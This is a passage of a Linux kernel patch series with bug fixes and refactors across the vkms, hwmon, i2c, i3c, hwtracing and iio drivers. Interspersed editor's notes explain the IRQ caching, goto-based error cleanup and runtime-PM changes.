+-		 * (2^16 - 1) / (2^8 - 1) division. Which, in this case, tries to get
+-		 * the best color value in a pixel format with more possibilities.
+-		 * A similar idea applies to others RGB color conversions.
+-		 */
+-		out_pixels[x].a = (u16)src_pixels[3] * 257;
+-		out_pixels[x].r = (u16)src_pixels[2] * 257;
+-		out_pixels[x].g = (u16)src_pixels[1] * 257;
+-		out_pixels[x].b = (u16)src_pixels[0] * 257;
+-	}
++	/*
++	 * The 257 is the "conversion ratio". This number is obtained by the
++	 * (2^16 - 1) / (2^8 - 1) division. Which, in this case, tries to get
++	 * the best color value in a pixel format with more possibilities.
++	 * A similar idea applies to other RGB color conversions.
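++	 * For example, 0xff * 257 = 0xffff, so an 8-bit channel maximum maps
++	 * exactly to the 16-bit maximum.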
++	 */
++	out_pixel->a = (u16)src_pixels[3] * 257;
++	out_pixel->r = (u16)src_pixels[2] * 257;
++	out_pixel->g = (u16)src_pixels[1] * 257;
++	out_pixel->b = (u16)src_pixels[0] * 257;
+ }
+ 
+-static void XRGB8888_to_argb_u16(struct line_buffer *stage_buffer,
+-				 const struct vkms_frame_info *frame_info, int y)
++static void XRGB8888_to_argb_u16(u8 *src_pixels, struct pixel_argb_u16 *out_pixel)
+ {
+-	struct pixel_argb_u16 *out_pixels = stage_buffer->pixels;
+-	u8 *src_pixels = get_packed_src_addr(frame_info, y);
+-	int x_limit = min_t(size_t, drm_rect_width(&frame_info->dst),
+-			    stage_buffer->n_pixels);
+-
+-	for (size_t x = 0; x < x_limit; x++, src_pixels += 4) {
+-		out_pixels[x].a = (u16)0xffff;
+-		out_pixels[x].r = (u16)src_pixels[2] * 257;
+-		out_pixels[x].g = (u16)src_pixels[1] * 257;
+-		out_pixels[x].b = (u16)src_pixels[0] * 257;
+-	}
++	out_pixel->a = (u16)0xffff;
++	out_pixel->r = (u16)src_pixels[2] * 257;
++	out_pixel->g = (u16)src_pixels[1] * 257;
++	out_pixel->b = (u16)src_pixels[0] * 257;
+ }
+ 
+-static void ARGB16161616_to_argb_u16(struct line_buffer *stage_buffer,
+-				     const struct vkms_frame_info *frame_info,
+-				     int y)
++static void ARGB16161616_to_argb_u16(u8 *src_pixels, struct pixel_argb_u16 *out_pixel)
+ {
+-	struct pixel_argb_u16 *out_pixels = stage_buffer->pixels;
+-	u16 *src_pixels = get_packed_src_addr(frame_info, y);
+-	int x_limit = min_t(size_t, drm_rect_width(&frame_info->dst),
+-			    stage_buffer->n_pixels);
++	u16 *pixels = (u16 *)src_pixels;
+ 
+-	for (size_t x = 0; x < x_limit; x++, src_pixels += 4) {
+-		out_pixels[x].a = le16_to_cpu(src_pixels[3]);
+-		out_pixels[x].r = le16_to_cpu(src_pixels[2]);
+-		out_pixels[x].g = le16_to_cpu(src_pixels[1]);
+-		out_pixels[x].b = le16_to_cpu(src_pixels[0]);
+-	}
++	out_pixel->a = le16_to_cpu(pixels[3]);
++	out_pixel->r = le16_to_cpu(pixels[2]);
++	out_pixel->g = le16_to_cpu(pixels[1]);
++	out_pixel->b = le16_to_cpu(pixels[0]);
+ }
+ 
+-static void XRGB16161616_to_argb_u16(struct line_buffer *stage_buffer,
+-				     const struct vkms_frame_info *frame_info,
+-				     int y)
++static void XRGB16161616_to_argb_u16(u8 *src_pixels, struct pixel_argb_u16 *out_pixel)
+ {
+-	struct pixel_argb_u16 *out_pixels = stage_buffer->pixels;
+-	u16 *src_pixels = get_packed_src_addr(frame_info, y);
+-	int x_limit = min_t(size_t, drm_rect_width(&frame_info->dst),
+-			    stage_buffer->n_pixels);
++	u16 *pixels = (u16 *)src_pixels;
+ 
+-	for (size_t x = 0; x < x_limit; x++, src_pixels += 4) {
+-		out_pixels[x].a = (u16)0xffff;
+-		out_pixels[x].r = le16_to_cpu(src_pixels[2]);
+-		out_pixels[x].g = le16_to_cpu(src_pixels[1]);
+-		out_pixels[x].b = le16_to_cpu(src_pixels[0]);
+-	}
++	out_pixel->a = (u16)0xffff;
++	out_pixel->r = le16_to_cpu(pixels[2]);
++	out_pixel->g = le16_to_cpu(pixels[1]);
++	out_pixel->b = le16_to_cpu(pixels[0]);
+ }
+ 
+-static void RGB565_to_argb_u16(struct line_buffer *stage_buffer,
+-			       const struct vkms_frame_info *frame_info, int y)
++static void RGB565_to_argb_u16(u8 *src_pixels, struct pixel_argb_u16 *out_pixel)
+ {
+-	struct pixel_argb_u16 *out_pixels = stage_buffer->pixels;
+-	u16 *src_pixels = get_packed_src_addr(frame_info, y);
+-	int x_limit = min_t(size_t, drm_rect_width(&frame_info->dst),
+-			       stage_buffer->n_pixels);
++	u16 *pixels = (u16 *)src_pixels;
+ 
+ 	s64 fp_rb_ratio = drm_fixp_div(drm_int2fixp(65535), drm_int2fixp(31));
+ 	s64 fp_g_ratio = drm_fixp_div(drm_int2fixp(65535), drm_int2fixp(63));
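++	/* Expand 5-bit R/B (max 31) and 6-bit G (max 63) to the 16-bit range. */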
+ 
+-	for (size_t x = 0; x < x_limit; x++, src_pixels++) {
+-		u16 rgb_565 = le16_to_cpu(*src_pixels);
+-		s64 fp_r = drm_int2fixp((rgb_565 >> 11) & 0x1f);
+-		s64 fp_g = drm_int2fixp((rgb_565 >> 5) & 0x3f);
+-		s64 fp_b = drm_int2fixp(rgb_565 & 0x1f);
++	u16 rgb_565 = le16_to_cpu(*pixels);
++	s64 fp_r = drm_int2fixp((rgb_565 >> 11) & 0x1f);
++	s64 fp_g = drm_int2fixp((rgb_565 >> 5) & 0x3f);
++	s64 fp_b = drm_int2fixp(rgb_565 & 0x1f);
+ 
+-		out_pixels[x].a = (u16)0xffff;
+-		out_pixels[x].r = drm_fixp2int(drm_fixp_mul(fp_r, fp_rb_ratio));
+-		out_pixels[x].g = drm_fixp2int(drm_fixp_mul(fp_g, fp_g_ratio));
+-		out_pixels[x].b = drm_fixp2int(drm_fixp_mul(fp_b, fp_rb_ratio));
+-	}
++	out_pixel->a = (u16)0xffff;
++	out_pixel->r = drm_fixp2int_round(drm_fixp_mul(fp_r, fp_rb_ratio));
++	out_pixel->g = drm_fixp2int_round(drm_fixp_mul(fp_g, fp_g_ratio));
++	out_pixel->b = drm_fixp2int_round(drm_fixp_mul(fp_b, fp_rb_ratio));
++}
++
++void vkms_compose_row(struct line_buffer *stage_buffer, struct vkms_plane_state *plane, int y)
++{
++	struct pixel_argb_u16 *out_pixels = stage_buffer->pixels;
++	struct vkms_frame_info *frame_info = plane->frame_info;
++	u8 *src_pixels = get_packed_src_addr(frame_info, y);
++	int limit = min_t(size_t, drm_rect_width(&frame_info->dst), stage_buffer->n_pixels);
++
++	for (size_t x = 0; x < limit; x++, src_pixels += frame_info->cpp)
++		plane->pixel_read(src_pixels, &out_pixels[x]);
+ }
+ 
+ /*
+@@ -241,15 +216,15 @@ static void argb_u16_to_RGB565(struct vkms_frame_info *frame_info,
+ 		s64 fp_g = drm_int2fixp(in_pixels[x].g);
+ 		s64 fp_b = drm_int2fixp(in_pixels[x].b);
+ 
+-		u16 r = drm_fixp2int(drm_fixp_div(fp_r, fp_rb_ratio));
+-		u16 g = drm_fixp2int(drm_fixp_div(fp_g, fp_g_ratio));
+-		u16 b = drm_fixp2int(drm_fixp_div(fp_b, fp_rb_ratio));
++		u16 r = drm_fixp2int_round(drm_fixp_div(fp_r, fp_rb_ratio));
++		u16 g = drm_fixp2int_round(drm_fixp_div(fp_g, fp_g_ratio));
++		u16 b = drm_fixp2int_round(drm_fixp_div(fp_b, fp_rb_ratio));
+ 
+ 		*dst_pixels = cpu_to_le16(r << 11 | g << 5 | b);
+ 	}
+ }
+ 
+-void *get_frame_to_line_function(u32 format)
++void *get_pixel_conversion_function(u32 format)
+ {
+ 	switch (format) {
+ 	case DRM_FORMAT_ARGB8888:
+diff --git a/drivers/gpu/drm/vkms/vkms_formats.h b/drivers/gpu/drm/vkms/vkms_formats.h
+index 43b7c19790181..c5b113495d0c0 100644
+--- a/drivers/gpu/drm/vkms/vkms_formats.h
++++ b/drivers/gpu/drm/vkms/vkms_formats.h
+@@ -5,7 +5,7 @@
+ 
+ #include "vkms_drv.h"
+ 
+-void *get_frame_to_line_function(u32 format);
++void *get_pixel_conversion_function(u32 format);
+ 
+ void *get_line_to_frame_function(u32 format);
+ 
+diff --git a/drivers/gpu/drm/vkms/vkms_plane.c b/drivers/gpu/drm/vkms/vkms_plane.c
+index c3a845220e10c..80e964589cecb 100644
+--- a/drivers/gpu/drm/vkms/vkms_plane.c
++++ b/drivers/gpu/drm/vkms/vkms_plane.c
+@@ -123,7 +123,7 @@ static void vkms_plane_atomic_update(struct drm_plane *plane,
+ 	frame_info->offset = fb->offsets[0];
+ 	frame_info->pitch = fb->pitches[0];
+ 	frame_info->cpp = fb->format->cpp[0];
+-	vkms_plane_state->plane_read = get_frame_to_line_function(fmt);
++	vkms_plane_state->pixel_read = get_pixel_conversion_function(fmt);
+ }
+ 
+ static int vkms_plane_atomic_check(struct drm_plane *plane,
+diff --git a/drivers/hid/Kconfig b/drivers/hid/Kconfig
+index 185a077d59cdd..c1873ccc7248d 100644
+--- a/drivers/hid/Kconfig
++++ b/drivers/hid/Kconfig
+@@ -1262,7 +1262,7 @@ config HID_MCP2221
+ 
+ config HID_KUNIT_TEST
+ 	tristate "KUnit tests for HID" if !KUNIT_ALL_TESTS
+-	depends on KUNIT=y
++	depends on KUNIT
+ 	depends on HID_UCLOGIC
+ 	default KUNIT_ALL_TESTS
+ 	help
+diff --git a/drivers/hwmon/f71882fg.c b/drivers/hwmon/f71882fg.c
+index 70121482a6173..27207ec6f7feb 100644
+--- a/drivers/hwmon/f71882fg.c
++++ b/drivers/hwmon/f71882fg.c
+@@ -1096,8 +1096,11 @@ static ssize_t show_pwm(struct device *dev,
+ 		val = data->pwm[nr];
+ 	else {
+ 		/* RPM mode */
+-		val = 255 * fan_from_reg(data->fan_target[nr])
+-			/ fan_from_reg(data->fan_full_speed[nr]);
++		if (fan_from_reg(data->fan_full_speed[nr]))
++			val = 255 * fan_from_reg(data->fan_target[nr])
++				/ fan_from_reg(data->fan_full_speed[nr]);
++		else
++			val = 0;
+ 	}
+ 	mutex_unlock(&data->update_lock);
+ 	return sprintf(buf, "%d\n", val);
+diff --git a/drivers/hwmon/gsc-hwmon.c b/drivers/hwmon/gsc-hwmon.c
+index b60ec95b5edbf..74bfc21c2767b 100644
+--- a/drivers/hwmon/gsc-hwmon.c
++++ b/drivers/hwmon/gsc-hwmon.c
+@@ -82,8 +82,8 @@ static ssize_t pwm_auto_point_temp_store(struct device *dev,
+ 	if (kstrtol(buf, 10, &temp))
+ 		return -EINVAL;
+ 
+-	temp = clamp_val(temp, 0, 10000);
+-	temp = DIV_ROUND_CLOSEST(temp, 10);
++	temp = clamp_val(temp, 0, 100000);
++	temp = DIV_ROUND_CLOSEST(temp, 100);
+ 
+ 	regs[0] = temp & 0xff;
+ 	regs[1] = (temp >> 8) & 0xff;
+@@ -100,7 +100,7 @@ static ssize_t pwm_auto_point_pwm_show(struct device *dev,
+ {
+ 	struct sensor_device_attribute *attr = to_sensor_dev_attr(devattr);
+ 
+-	return sprintf(buf, "%d\n", 255 * (50 + (attr->index * 10)));
++	return sprintf(buf, "%d\n", 255 * (50 + (attr->index * 10)) / 100);
+ }
+ 
+ static SENSOR_DEVICE_ATTR_RO(pwm1_auto_point1_pwm, pwm_auto_point_pwm, 0);
+diff --git a/drivers/hwmon/pmbus/adm1275.c b/drivers/hwmon/pmbus/adm1275.c
+index 3b07bfb43e937..b8543c06d022a 100644
+--- a/drivers/hwmon/pmbus/adm1275.c
++++ b/drivers/hwmon/pmbus/adm1275.c
+@@ -37,10 +37,13 @@ enum chips { adm1075, adm1272, adm1275, adm1276, adm1278, adm1293, adm1294 };
+ 
+ #define ADM1272_IRANGE			BIT(0)
+ 
++#define ADM1278_TSFILT			BIT(15)
+ #define ADM1278_TEMP1_EN		BIT(3)
+ #define ADM1278_VIN_EN			BIT(2)
+ #define ADM1278_VOUT_EN			BIT(1)
+ 
++#define ADM1278_PMON_DEFCONFIG		(ADM1278_VOUT_EN | ADM1278_TEMP1_EN | ADM1278_TSFILT)
++
+ #define ADM1293_IRANGE_25		0
+ #define ADM1293_IRANGE_50		BIT(6)
+ #define ADM1293_IRANGE_100		BIT(7)
+@@ -462,6 +465,22 @@ static const struct i2c_device_id adm1275_id[] = {
+ };
+ MODULE_DEVICE_TABLE(i2c, adm1275_id);
+ 
++/* Enable VOUT & TEMP1 if not enabled (disabled by default) */
++static int adm1275_enable_vout_temp(struct i2c_client *client, int config)
++{
++	int ret;
++
++	if ((config & ADM1278_PMON_DEFCONFIG) != ADM1278_PMON_DEFCONFIG) {
++		config |= ADM1278_PMON_DEFCONFIG;
++		ret = i2c_smbus_write_word_data(client, ADM1275_PMON_CONFIG, config);
++		if (ret < 0) {
++			dev_err(&client->dev, "Failed to enable VOUT/TEMP1 monitoring\n");
++			return ret;
++		}
++	}
++	return 0;
++}
++
+ static int adm1275_probe(struct i2c_client *client)
+ {
+ 	s32 (*config_read_fn)(const struct i2c_client *client, u8 reg);
+@@ -615,19 +634,10 @@ static int adm1275_probe(struct i2c_client *client)
+ 			PMBUS_HAVE_VOUT | PMBUS_HAVE_STATUS_VOUT |
+ 			PMBUS_HAVE_TEMP | PMBUS_HAVE_STATUS_TEMP;
+ 
+-		/* Enable VOUT & TEMP1 if not enabled (disabled by default) */
+-		if ((config & (ADM1278_VOUT_EN | ADM1278_TEMP1_EN)) !=
+-		    (ADM1278_VOUT_EN | ADM1278_TEMP1_EN)) {
+-			config |= ADM1278_VOUT_EN | ADM1278_TEMP1_EN;
+-			ret = i2c_smbus_write_byte_data(client,
+-							ADM1275_PMON_CONFIG,
+-							config);
+-			if (ret < 0) {
+-				dev_err(&client->dev,
+-					"Failed to enable VOUT monitoring\n");
+-				return -ENODEV;
+-			}
+-		}
++		ret = adm1275_enable_vout_temp(client, config);
++		if (ret)
++			return ret;
++
+ 		if (config & ADM1278_VIN_EN)
+ 			info->func[0] |= PMBUS_HAVE_VIN;
+ 		break;
+@@ -684,19 +694,9 @@ static int adm1275_probe(struct i2c_client *client)
+ 			PMBUS_HAVE_VOUT | PMBUS_HAVE_STATUS_VOUT |
+ 			PMBUS_HAVE_TEMP | PMBUS_HAVE_STATUS_TEMP;
+ 
+-		/* Enable VOUT & TEMP1 if not enabled (disabled by default) */
+-		if ((config & (ADM1278_VOUT_EN | ADM1278_TEMP1_EN)) !=
+-		    (ADM1278_VOUT_EN | ADM1278_TEMP1_EN)) {
+-			config |= ADM1278_VOUT_EN | ADM1278_TEMP1_EN;
+-			ret = i2c_smbus_write_word_data(client,
+-							ADM1275_PMON_CONFIG,
+-							config);
+-			if (ret < 0) {
+-				dev_err(&client->dev,
+-					"Failed to enable VOUT monitoring\n");
+-				return -ENODEV;
+-			}
+-		}
++		ret = adm1275_enable_vout_temp(client, config);
++		if (ret)
++			return ret;
+ 
+ 		if (config & ADM1278_VIN_EN)
+ 			info->func[0] |= PMBUS_HAVE_VIN;
+diff --git a/drivers/hwtracing/coresight/coresight-core.c b/drivers/hwtracing/coresight/coresight-core.c
+index f3068175ca9d9..bcb08fadccf21 100644
+--- a/drivers/hwtracing/coresight/coresight-core.c
++++ b/drivers/hwtracing/coresight/coresight-core.c
+@@ -1446,13 +1446,8 @@ static int coresight_remove_match(struct device *dev, void *data)
+ 		if (csdev->dev.fwnode == conn->child_fwnode) {
+ 			iterator->orphan = true;
+ 			coresight_remove_links(iterator, conn);
+-			/*
+-			 * Drop the reference to the handle for the remote
+-			 * device acquired in parsing the connections from
+-			 * platform data.
+-			 */
+-			fwnode_handle_put(conn->child_fwnode);
+-			conn->child_fwnode = NULL;
++
++			conn->child_dev = NULL;
+ 			/* No need to continue */
+ 			break;
+ 		}
+diff --git a/drivers/hwtracing/ptt/hisi_ptt.c b/drivers/hwtracing/ptt/hisi_ptt.c
+index 30f1525639b57..4140efd664097 100644
+--- a/drivers/hwtracing/ptt/hisi_ptt.c
++++ b/drivers/hwtracing/ptt/hisi_ptt.c
+@@ -341,13 +341,13 @@ static int hisi_ptt_register_irq(struct hisi_ptt *hisi_ptt)
+ 	if (ret < 0)
+ 		return ret;
+ 
+-	ret = devm_request_threaded_irq(&pdev->dev,
+-					pci_irq_vector(pdev, HISI_PTT_TRACE_DMA_IRQ),
++	hisi_ptt->trace_irq = pci_irq_vector(pdev, HISI_PTT_TRACE_DMA_IRQ);
++	ret = devm_request_threaded_irq(&pdev->dev, hisi_ptt->trace_irq,
+ 					NULL, hisi_ptt_isr, 0,
+ 					DRV_NAME, hisi_ptt);
+ 	if (ret) {
+ 		pci_err(pdev, "failed to request irq %d, ret = %d\n",
+-			pci_irq_vector(pdev, HISI_PTT_TRACE_DMA_IRQ), ret);
++			hisi_ptt->trace_irq, ret);
+ 		return ret;
+ 	}
+ 
+@@ -757,8 +757,7 @@ static void hisi_ptt_pmu_start(struct perf_event *event, int flags)
+ 	 * core in event_function_local(). If CPU passed is offline we'll fail
+ 	 * here, just log it since we can do nothing here.
+ 	 */
+-	ret = irq_set_affinity(pci_irq_vector(hisi_ptt->pdev, HISI_PTT_TRACE_DMA_IRQ),
+-					      cpumask_of(cpu));
++	ret = irq_set_affinity(hisi_ptt->trace_irq, cpumask_of(cpu));
+ 	if (ret)
+ 		dev_warn(dev, "failed to set the affinity of trace interrupt\n");
+ 
+@@ -1018,8 +1017,7 @@ static int hisi_ptt_cpu_teardown(unsigned int cpu, struct hlist_node *node)
+ 	 * Also make sure the interrupt bind to the migrated CPU as well. Warn
+ 	 * the user on failure here.
+ 	 */
+-	if (irq_set_affinity(pci_irq_vector(hisi_ptt->pdev, HISI_PTT_TRACE_DMA_IRQ),
+-					    cpumask_of(target)))
++	if (irq_set_affinity(hisi_ptt->trace_irq, cpumask_of(target)))
+ 		dev_warn(dev, "failed to set the affinity of trace interrupt\n");
+ 
+ 	hisi_ptt->trace_ctrl.on_cpu = target;
+diff --git a/drivers/hwtracing/ptt/hisi_ptt.h b/drivers/hwtracing/ptt/hisi_ptt.h
+index 5beb1648c93ab..948a4c4231527 100644
+--- a/drivers/hwtracing/ptt/hisi_ptt.h
++++ b/drivers/hwtracing/ptt/hisi_ptt.h
+@@ -166,6 +166,7 @@ struct hisi_ptt_pmu_buf {
+  * @pdev:         pci_dev of this PTT device
+  * @tune_lock:    lock to serialize the tune process
+  * @pmu_lock:     lock to serialize the perf process
++ * @trace_irq:    interrupt number used by trace
+  * @upper_bdf:    the upper BDF range of the PCI devices managed by this PTT device
+  * @lower_bdf:    the lower BDF range of the PCI devices managed by this PTT device
+  * @port_filters: the filter list of root ports
+@@ -180,6 +181,7 @@ struct hisi_ptt {
+ 	struct pci_dev *pdev;
+ 	struct mutex tune_lock;
+ 	spinlock_t pmu_lock;
++	int trace_irq;
+ 	u32 upper_bdf;
+ 	u32 lower_bdf;
+ 
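
[Editor's note] The three hisi_ptt hunks above share one idea: resolve the Linux interrupt number with pci_irq_vector() once, when the handler is requested, cache it in the new trace_irq field, and reuse it from the pmu_start and CPU-hotplug paths instead of re-deriving it each time. Condensed (illustrative only, not a complete driver):

	/* registration: look the vector up once and cache it */
	hisi_ptt->trace_irq = pci_irq_vector(pdev, HISI_PTT_TRACE_DMA_IRQ);
	ret = devm_request_threaded_irq(&pdev->dev, hisi_ptt->trace_irq,
					NULL, hisi_ptt_isr, 0, DRV_NAME,
					hisi_ptt);

	/* later, on start and on hotplug migration: reuse the cached irq */
	irq_set_affinity(hisi_ptt->trace_irq, cpumask_of(cpu));
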
+diff --git a/drivers/i2c/busses/i2c-designware-pcidrv.c b/drivers/i2c/busses/i2c-designware-pcidrv.c
+index 782fe1ef3ca10..61d7a27aa0701 100644
+--- a/drivers/i2c/busses/i2c-designware-pcidrv.c
++++ b/drivers/i2c/busses/i2c-designware-pcidrv.c
+@@ -20,6 +20,7 @@
+ #include <linux/module.h>
+ #include <linux/pci.h>
+ #include <linux/pm_runtime.h>
++#include <linux/power_supply.h>
+ #include <linux/sched.h>
+ #include <linux/slab.h>
+ 
+@@ -234,6 +235,16 @@ static const struct dev_pm_ops i2c_dw_pm_ops = {
+ 	SET_RUNTIME_PM_OPS(i2c_dw_pci_runtime_suspend, i2c_dw_pci_runtime_resume, NULL)
+ };
+ 
++static const struct property_entry dgpu_properties[] = {
++	/* USB-C doesn't power the system */
++	PROPERTY_ENTRY_U8("scope", POWER_SUPPLY_SCOPE_DEVICE),
++	{}
++};
++
++static const struct software_node dgpu_node = {
++	.properties = dgpu_properties,
++};
++
+ static int i2c_dw_pci_probe(struct pci_dev *pdev,
+ 			    const struct pci_device_id *id)
+ {
+@@ -325,7 +336,7 @@ static int i2c_dw_pci_probe(struct pci_dev *pdev,
+ 	}
+ 
+ 	if ((dev->flags & MODEL_MASK) == MODEL_AMD_NAVI_GPU) {
+-		dev->slave = i2c_new_ccgx_ucsi(&dev->adapter, dev->irq, NULL);
++		dev->slave = i2c_new_ccgx_ucsi(&dev->adapter, dev->irq, &dgpu_node);
+ 		if (IS_ERR(dev->slave))
+ 			return dev_err_probe(dev->dev, PTR_ERR(dev->slave),
+ 					     "register UCSI failed\n");
+diff --git a/drivers/i2c/busses/i2c-nvidia-gpu.c b/drivers/i2c/busses/i2c-nvidia-gpu.c
+index 12e330cd7635b..26622d24bb1b2 100644
+--- a/drivers/i2c/busses/i2c-nvidia-gpu.c
++++ b/drivers/i2c/busses/i2c-nvidia-gpu.c
+@@ -14,6 +14,7 @@
+ #include <linux/platform_device.h>
+ #include <linux/pm.h>
+ #include <linux/pm_runtime.h>
++#include <linux/power_supply.h>
+ 
+ #include <asm/unaligned.h>
+ 
+@@ -259,8 +260,10 @@ static const struct pci_device_id gpu_i2c_ids[] = {
+ MODULE_DEVICE_TABLE(pci, gpu_i2c_ids);
+ 
+ static const struct property_entry ccgx_props[] = {
+-	/* Use FW built for NVIDIA (nv) only */
+-	PROPERTY_ENTRY_U16("ccgx,firmware-build", ('n' << 8) | 'v'),
++	/* Use FW built for NVIDIA GPU only */
++	PROPERTY_ENTRY_STRING("firmware-name", "nvidia,gpu"),
++	/* USB-C doesn't power the system */
++	PROPERTY_ENTRY_U8("scope", POWER_SUPPLY_SCOPE_DEVICE),
+ 	{ }
+ };
+ 
+diff --git a/drivers/i2c/busses/i2c-qup.c b/drivers/i2c/busses/i2c-qup.c
+index 2e153f2f71b6d..78682388e02ed 100644
+--- a/drivers/i2c/busses/i2c-qup.c
++++ b/drivers/i2c/busses/i2c-qup.c
+@@ -1752,16 +1752,21 @@ nodma:
+ 	if (!clk_freq || clk_freq > I2C_MAX_FAST_MODE_PLUS_FREQ) {
+ 		dev_err(qup->dev, "clock frequency not supported %d\n",
+ 			clk_freq);
+-		return -EINVAL;
++		ret = -EINVAL;
++		goto fail_dma;
+ 	}
+ 
+ 	qup->base = devm_platform_ioremap_resource(pdev, 0);
+-	if (IS_ERR(qup->base))
+-		return PTR_ERR(qup->base);
++	if (IS_ERR(qup->base)) {
++		ret = PTR_ERR(qup->base);
++		goto fail_dma;
++	}
+ 
+ 	qup->irq = platform_get_irq(pdev, 0);
+-	if (qup->irq < 0)
+-		return qup->irq;
++	if (qup->irq < 0) {
++		ret = qup->irq;
++		goto fail_dma;
++	}
+ 
+ 	if (has_acpi_companion(qup->dev)) {
+ 		ret = device_property_read_u32(qup->dev,
+@@ -1775,13 +1780,15 @@ nodma:
+ 		qup->clk = devm_clk_get(qup->dev, "core");
+ 		if (IS_ERR(qup->clk)) {
+ 			dev_err(qup->dev, "Could not get core clock\n");
+-			return PTR_ERR(qup->clk);
++			ret = PTR_ERR(qup->clk);
++			goto fail_dma;
+ 		}
+ 
+ 		qup->pclk = devm_clk_get(qup->dev, "iface");
+ 		if (IS_ERR(qup->pclk)) {
+ 			dev_err(qup->dev, "Could not get iface clock\n");
+-			return PTR_ERR(qup->pclk);
++			ret = PTR_ERR(qup->pclk);
++			goto fail_dma;
+ 		}
+ 		qup_i2c_enable_clocks(qup);
+ 		src_clk_freq = clk_get_rate(qup->clk);
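
[Editor's note] Every error path touched in the i2c-qup hunk above changes a direct return into setting ret and jumping to fail_dma, presumably because the fail_dma label releases DMA channels acquired earlier in probe (outside this excerpt). A standalone model of the idiom, using malloc/free as stand-ins for the DMA channels:

	#include <stdio.h>
	#include <stdlib.h>

	static int probe(void)
	{
		char *dma = malloc(64);		/* resource acquired first */
		int ret;

		if (!dma)
			return -1;

		ret = -1;			/* pretend a later step failed */
		if (ret)
			goto fail_dma;		/* unwind, don't just return */

		return 0;

	fail_dma:
		free(dma);			/* release what we already hold */
		return ret;
	}

	int main(void)
	{
		printf("probe() = %d\n", probe());
		return 0;
	}
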
+diff --git a/drivers/i2c/busses/i2c-xiic.c b/drivers/i2c/busses/i2c-xiic.c
+index effae4d467291..b41a6709e47f2 100644
+--- a/drivers/i2c/busses/i2c-xiic.c
++++ b/drivers/i2c/busses/i2c-xiic.c
+@@ -431,6 +431,8 @@ static irqreturn_t xiic_process(int irq, void *dev_id)
+ 			wakeup_req = 1;
+ 			wakeup_code = STATE_ERROR;
+ 		}
++		/* don't try to handle other events */
++		goto out;
+ 	}
+ 	if (pend & XIIC_INTR_RX_FULL_MASK) {
+ 		/* Receive register/FIFO is full */
+diff --git a/drivers/i3c/master/svc-i3c-master.c b/drivers/i3c/master/svc-i3c-master.c
+index d6e9ed74cdcf4..d47360f8a1f36 100644
+--- a/drivers/i3c/master/svc-i3c-master.c
++++ b/drivers/i3c/master/svc-i3c-master.c
+@@ -1090,12 +1090,6 @@ static void svc_i3c_master_start_xfer_locked(struct svc_i3c_master *master)
+ 	if (!xfer)
+ 		return;
+ 
+-	ret = pm_runtime_resume_and_get(master->dev);
+-	if (ret < 0) {
+-		dev_err(master->dev, "<%s> Cannot get runtime PM.\n", __func__);
+-		return;
+-	}
+-
+ 	svc_i3c_master_clear_merrwarn(master);
+ 	svc_i3c_master_flush_fifo(master);
+ 
+@@ -1110,9 +1104,6 @@ static void svc_i3c_master_start_xfer_locked(struct svc_i3c_master *master)
+ 			break;
+ 	}
+ 
+-	pm_runtime_mark_last_busy(master->dev);
+-	pm_runtime_put_autosuspend(master->dev);
+-
+ 	xfer->ret = ret;
+ 	complete(&xfer->comp);
+ 
+@@ -1133,6 +1124,13 @@ static void svc_i3c_master_enqueue_xfer(struct svc_i3c_master *master,
+ 					struct svc_i3c_xfer *xfer)
+ {
+ 	unsigned long flags;
++	int ret;
++
++	ret = pm_runtime_resume_and_get(master->dev);
++	if (ret < 0) {
++		dev_err(master->dev, "<%s> Cannot get runtime PM.\n", __func__);
++		return;
++	}
+ 
+ 	init_completion(&xfer->comp);
+ 	spin_lock_irqsave(&master->xferqueue.lock, flags);
+@@ -1143,6 +1141,9 @@ static void svc_i3c_master_enqueue_xfer(struct svc_i3c_master *master,
+ 		svc_i3c_master_start_xfer_locked(master);
+ 	}
+ 	spin_unlock_irqrestore(&master->xferqueue.lock, flags);
++
++	pm_runtime_mark_last_busy(master->dev);
++	pm_runtime_put_autosuspend(master->dev);
+ }
+ 
+ static bool
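
[Editor's note] The net effect of the two svc-i3c-master hunks above is to move the runtime-PM reference from svc_i3c_master_start_xfer_locked(), which runs with the xferqueue lock held, into svc_i3c_master_enqueue_xfer(), so one get/put pair brackets the whole enqueue-and-start sequence. In sketch form (enqueue_locked() is a hypothetical stand-in for the list handling):

	ret = pm_runtime_resume_and_get(master->dev);	/* wake controller */
	if (ret < 0)
		return;

	spin_lock_irqsave(&master->xferqueue.lock, flags);
	enqueue_locked(master, xfer);		/* may kick off the transfer */
	spin_unlock_irqrestore(&master->xferqueue.lock, flags);

	pm_runtime_mark_last_busy(master->dev);
	pm_runtime_put_autosuspend(master->dev);	/* arm autosuspend */
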
+diff --git a/drivers/iio/accel/fxls8962af-core.c b/drivers/iio/accel/fxls8962af-core.c
+index 8874d6d617253..8bc516a57e358 100644
+--- a/drivers/iio/accel/fxls8962af-core.c
++++ b/drivers/iio/accel/fxls8962af-core.c
+@@ -725,8 +725,7 @@ static const struct iio_event_spec fxls8962af_event[] = {
+ 		.sign = 's', \
+ 		.realbits = 12, \
+ 		.storagebits = 16, \
+-		.shift = 4, \
+-		.endianness = IIO_BE, \
++		.endianness = IIO_LE, \
+ 	}, \
+ 	.event_spec = fxls8962af_event, \
+ 	.num_event_specs = ARRAY_SIZE(fxls8962af_event), \
+@@ -905,9 +904,10 @@ static int fxls8962af_fifo_transfer(struct fxls8962af_data *data,
+ 	int total_length = samples * sample_length;
+ 	int ret;
+ 
+-	if (i2c_verify_client(dev))
++	if (i2c_verify_client(dev) &&
++	    data->chip_info->chip_id == FXLS8962AF_DEVICE_ID)
+ 		/*
+-		 * Due to errata bug:
++		 * Due to an erratum (only applicable to fxls8962af):
+ 		 * E3: FIFO burst read operation error using I2C interface
+ 		 * We have to avoid burst reads on I2C..
+ 		 */
+diff --git a/drivers/iio/adc/ad7192.c b/drivers/iio/adc/ad7192.c
+index a8f6fa48daa8e..8720ac43a4a4a 100644
+--- a/drivers/iio/adc/ad7192.c
++++ b/drivers/iio/adc/ad7192.c
+@@ -368,7 +368,7 @@ static int ad7192_of_clock_select(struct ad7192_state *st)
+ 	clock_sel = AD7192_CLK_INT;
+ 
+ 	/* use internal clock */
+-	if (st->mclk) {
++	if (!st->mclk) {
+ 		if (of_property_read_bool(np, "adi,int-clock-output-enable"))
+ 			clock_sel = AD7192_CLK_INT_CO;
+ 	} else {
+@@ -381,9 +381,9 @@ static int ad7192_of_clock_select(struct ad7192_state *st)
+ 	return clock_sel;
+ }
+ 
+-static int ad7192_setup(struct ad7192_state *st, struct device_node *np)
++static int ad7192_setup(struct iio_dev *indio_dev, struct device_node *np)
+ {
+-	struct iio_dev *indio_dev = spi_get_drvdata(st->sd.spi);
